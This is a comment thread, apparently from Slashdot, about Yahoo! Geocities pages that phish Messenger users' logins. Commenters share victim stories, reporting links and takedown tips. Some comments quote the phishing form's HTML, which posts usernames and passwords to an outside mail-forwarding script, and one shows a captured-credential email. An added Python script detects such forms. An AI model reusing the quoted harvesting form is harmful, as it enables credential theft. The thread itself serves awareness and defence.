Phishing in Yahoo! Geocities?
Van Cutter Romney asks: "I've received a lot of phishing IMs on my Yahoo! Messenger from contacts whose accounts I guess have been hacked into. All the phishing messages lead to Geocities websites like this where the user is displayed a Yahoo! login page. For most people, the page looks legitimate and they enter their Yahoo! username and password (I was nearly fooled once). Since both the website (Geocities) and the messenger belong to Yahoo!, I'd like to know if they are doing anything to counter these attacks."
Did you report it to Yahoo!? Or just Slashdot?
and I quote:
"NOTICE: We collect personal information on this site."
Ya think?!?
I never made the connection! Thanks Mr. Obvious!
Karma: Chameleon (mostly due to the fact that you come and go).
For those of you who are bored, you could try to get any of the addresses listed in the web form taken down.
<FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/mailto.cgi" ENCTYPE="x-www-form-urlencoded">
<INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo">
<INPUT TYPE="hidden" NAME="Mail_To" VALUE="havinfunfun@gmail.com">
<INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id">
I'm sure google would have a fun time going after whoever referred havinfunfun@gmail.com.
When I was asked for my username, password, and sexual orientation...
You take it, I don't want it...
Van Cutter Romney asks questions to the wrong people. I'd like to know if he'll ever ask the appropriate people.
What gives?
And yet the worst fishing site on geocities is still up-- since something like 1998? Someone's asleep at the wheel.
I found it obvious when I right clicked the page and it said Content (C) Flickr...I mean, the site says we are owned by Yahoo! then they claim Flickr owns the content.
Also consider the SSL link seems to not be phished. I tried dummy data in both login forms and it said "Page Not Found" for the phished page that was not secured, while it said "ID not found" when I entered the information on SSL site. Someone should report the site http://www2.fiberbit.net/ to the domain registrar since the form submission is done through a page on that server. I'm quite surprised the person didn't try to mask the email address, obviously that form is used on quite a number of sites since the email address is clearly specified in the page content -- this person deserves to be caught. I just hope no one bought into the scam....
People who use Flickr rock!
Not only does Flickr make you smell better, it also makes you more attractive.
Username: ohgodatleastspendthe
Password: $5foradomainname
The destination page is a 404 (I don't think it works?).
I was like, "Huh? Pissing in Yahoo Geocities?" Sounds good to... oh wait... phishing...
You are about 8 months late!
I initially was told that all you had to do was go to the site, by my roommate, but after a while found out he lied to me, and he logged in like this guy posted.
I've since got him the netcraft toolbar, which tells and can block you from going to phish sites, or at least warn you about it.
Only 'flamers' flame!
Does slashdot hate my posts?
Maybe I'm missing something, but why the hell are you asking us?
What I'm listening to now on Pandora...
I'll be honest. I spent all that time trying to figure out how the website was trying to scam people out of money. Then I realized that it was nothing more than a pun. Great job and very subtle, and it somehow being modded insightful made it even more funny.
Ooo man the floppy drive is broken. No wait. The computer is just upside down.
report the webpage and you're done.
Geocities is a kinda abandoned place (So much that webcomics make fun of it). There's no customer service, everything's automated there. The only thing that (I hope) isn't, is the "report offensive page" etc. The only change done to it was aesthetic and in the code. But the infrastructure remains.
In other words, geocities servers do NOT have personnel searching and identifying phishing sites on them. They have to rely on the users.
(This and popup ads led to the fall of free homepages. Most pages now are categorized in specialized sites: webcomics, blogs, art, fiction, and with youtube, videos).
This was bound to happen sooner or later. Yahoo neglected geocities, is it a mystery that it became a meeting point for illegal activities?
The next version of Geocities will require the user to check a box verifying that he is not a phisher.
If you view the source of the form on the phishing site you'll see that email address, it suuuure would be fun to spam that with fake info. Other info from the form that might be useful is:
Subject: "Yahoo id"
the URL for the mail form that's used is: http://www2.fiberbit.net/form/mailto.cgi
The usernames and passwords might go to a gmail account, but not sure it actually does or not - depends on the mailto.cgi.
Extract:
<FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/mailto.cgi" ENCTYPE="x-www-form-urlencoded">
<INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo">
<INPUT TYPE="hidden" NAME="Mail_To" VALUE="havinfunfun@gmail.com">
<INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id">
<INPUT TYPE="hidden" NAME="Next_Page" VALUE="http://www.geocities.com/got_milf.does_you
http://add.yahoo.com/fast/help/geo/cgi_abuse
But it tried to redirect me to some MILF site after I gave it a bogus login.
Ooogh.
$B$3$l$O%a!(B: ip0.0.0.0.ma.dl.cox.net / 0.0.0.0
$BAw?.85%V%i%&%6(B: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US;
rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
$BAw?.85#U#R#L!!(B:
login = bbb
passwd = bbb
Gibberish text is probably an encoding shortcoming from the crap e-mail account I had it sent to.
There is no XUL, only WebExtensions...
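The form quoted in the comments above sits on one host and posts the login fields to a mail-forwarding script on another. As an added example (not part of the original thread; the field-name rule, the placeholder page URL and the benign form are assumptions), a static check that flags password forms of that shape:

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hidden-field names from the form quoted in the thread; treating them as a
# form-to-mail signature is this example's assumption.
MAILER_FIELDS = {"mail_to", "mail_from", "mail_subject"}

class FormAudit(HTMLParser):
    """Collect each form's action, hidden fields and password inputs."""
    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # tag/attribute names arrive lower-cased
        if tag == "form":
            self.forms.append({"action": a.get("action", ""), "hidden": {}, "pw": False})
        elif tag == "input" and self.forms:
            kind = a.get("type", "text").lower()
            if kind == "hidden":
                self.forms[-1]["hidden"][a.get("name", "").lower()] = a.get("value", "")
            elif kind == "password":
                self.forms[-1]["pw"] = True

def audit_page(page_url, html):
    """Return (reason, detail) findings for password forms on one page."""
    parser = FormAudit()
    parser.feed(html)
    page_host = urlparse(page_url).hostname
    findings = []
    for form in parser.forms:
        if not form["pw"]:
            continue  # only credential-collecting forms matter here
        action = urlparse(form["action"])
        if action.hostname and action.hostname != page_host:
            findings.append(("cross-host-action", action.hostname))
        if action.scheme == "http":
            findings.append(("cleartext-action", form["action"]))
        for name in sorted(MAILER_FIELDS & set(form["hidden"])):
            findings.append(("mailer-hidden-field", f"{name}={form['hidden'][name]}"))
    return findings

# Constructed sample: hidden field quoted in the thread plus two visible
# inputs; the page URL is a placeholder, not the real phishing page.
PHISH_URL = "http://www.geocities.com/placeholder_page/"
PHISH_HTML = """<FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/mailto.cgi">
<INPUT TYPE="hidden" NAME="Mail_To" VALUE="havinfunfun@gmail.com">
<INPUT TYPE="text" NAME="login"><INPUT TYPE="password" NAME="passwd"></FORM>"""
# Constructed benign form: relative action, no mailer fields.
LEGIT_HTML = '<form method="post" action="/signin"><input type="password" name="p"></form>'
```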
Yahoo! has huge security problems with their accounts. So does Hotmail. I'm not going to get into the details, but let me say this. For my friends and family who forgot their password to their Yahoo! account, it's fairly easy to get their account back for them.
While I work for Yahoo! I do not speak for them officially. I do not work on any of the products mentioned.
We do have teams of people who work to fight any abuse of any of our products. When sites like those are found, they are taken down.
Please report any instances of situations like those you described to:
http://abuse.yahoo.com/ or abuse@yahoo-inc.com
Who *doesn't* know that Yahoo/Geocities is a major phishing/script-kiddie resource and host?? This isn't news to anyone who has experience chatting in Yahoo chatrooms.
There are script-kiddies and S/N stealers that constantly use geocities pages to host everything from phishing pages to outright trojan .exe files, disguised as videos or whatever, that they spam links to in yahoo chatrooms with, in an almost constant barrage.
There is a subgroup of huge-egoed "1337" yahoo chatters that deal in stolen screen names and "illegal" or "illy" names in trade for other names, or straight cash.
Yahoo seems to pay no attention whatsoever to their abuse reporting system. I've reported a geocities page hosting a trojan multiple times, and the site remained up for over a year, with the same trojan .exe file.
One of the biggest things driving this subgroup of crackers and script-kiddies are the chat-bot spammers, who buy lists of stolen screen-names/accounts on which to log-on their spam/porn bots. There is an entire underground economy of stolen accounts/screen-names much larger and much older than any of the MMORPG gold trader/seller economies that have gotten so much press of late.
I think Yahoo, despite all of their denials, are in bed with the spam/porn-bot operators, and turn a blind eye, even protecting them. I know people who chat on Yahoo that run "booter" programs that will kick/flood a chatter out of a room, even completely disconnect someone from Yahoo. They regularly boot normal chatters with impunity, but fear to boot "porn/spam-bots", as Yahoo will quickly shut down the booters' "bot" account(s) (most 'booter' programs utilise 'bots' to send their disconnect packets/IM floods/etc) and even ban the booter-operators' account and block that IP address.
If I were this fellow, I'd consider myself lucky that the only thing he got from a geocities webpage was a phishing page, as opposed to a virus or trojan with much more serious and far-reaching consequences than having a Yahoo screen-name/account cracked or stolen.
Cheers!
Strat
Progressivism (aka US 'Liberalism'): Ideas so good they need a police/surveillance-state to enforce.
Yup, I was a victim of this YM phishing because of my dumb user error. Here's my story...
:(
:(
I wasn't fully awake to notice the URLs because it was the middle of the night. I got a YM IM in my Trillian from someone whom I haven't heard from for months. It went like this (note: actual account/user names changed from their original ones):
Session Start (ant:onion): Sat Jan 07 02:28:11 2006
[02:28] onion: Hey check out this website for some photos of me tell me what you think http://www.myphoto-album.tk/
[02:28] *** Auto-response sent to onion: ant isn't around here at the moment.
[03:03] ant: I don't see anything even after logging in.
[03:03] *** You are currently disconnected. Messages will not be received.
[03:03] *** You are currently disconnected. Messages will not be received.
[03:04] *** You are currently disconnected. Messages will not be received.
[03:04] *** You are currently disconnected. Messages will not be received.
Session Close (onion): Sat Jan 07 03:07:05 2006
I thought YM servers went down or something. In the day time, it hit me. I got phished! My password was already changed (duh!).
I quickly e-mailed Yahoo! A few days later, Y! asked for my information that I used to sign up. The problem here was I never used real personal data in online accounts like Y! nor do I remember them. Plus, I signed up for my account like a decade ago.
My buddies on the contact list (had a local back up copy so easy to contact) all got this phish. I already warned them not to reply. But some of them were too late and actually fell for it.
I continued to e-mail Y!, but got nowhere. I eventually gave up and told them to shut down my account. However, Y! still refused. Of course, my buddies saw the fake me and phish IMs. Eventually, I told all my buddies to fill out the online abuse forms to Yahoo!'s abuse department to shut down my account for phishing. Then, I never heard of more online sightings and phishings from my account.
Here were two Web sites that were for collecting passwords (also contacted the hosts about my incidents). These fake Y!'s GeoCities were gone within days:
www.my-photo-albums.tk
www.myphoto-album.tk
I was glad I didn't use Yahoo account other than IM and launch.com. I hate these bundled services within a single account like Passport.
As you can see, social engineering at its best, even on people who know computers. I fell for it.
Ant(Dude) @ Quality Foraged Links (AQFL.net) & The Ant Farm (antfarm.ma.cx / antfarm.home.dhs.org).
Just tell gmail's abuse department about this article and phishing. :)
Ant(Dude) @ Quality Foraged Links (AQFL.net) & The Ant Farm (antfarm.ma.cx / antfarm.home.dhs.org).
http://www.castlecops.com/pirt
"PIRT Squad Fried Phish(TM) Phishing Incident Reporting and Termination (PIRT) Squad
A global phishing termination operation launched by CastleCops and Sunbelt Software, the volunteer PIRT Squad is comprised of folks who report phish, investigate phish, and actively work on phish takedown and termination (original concept by Robin Laudanski). PIRT is funded by CastleCops. Become a PIRT Squad terminator by reporting phish today!"
Anonymous Yahoo! Employee: We do have teams of people who work to fight any abuse of any of our products.
Unblock and properly 'man' abuse@yahoo.com and abuse@yahoo-inc.com then we'll talk about stopping user wrongdoing at Yahoo!
Proof from rfc-ignorant.org:
http://www.rfc-ignorant.org/tools/detail.php?domain=yahoo.com&submitted=1123294881&table=abuse
http://www.rfc-ignorant.org/tools/detail.php?domain=yahoo-inc.com&submitted=1123294118&table=abuse
:P
You corporate tool...
As are about all gainfully/legally employed people [like myself at the moment] not gainfully/legally self-employed... =/
If you are 100% self-employed, count your blessings -- you've escaped the 'rat race' that saps the vitality of mankind everywhere in the name of 'increased corporate profit'....
Check out this blog article which goes into detail on this new phishing scheme.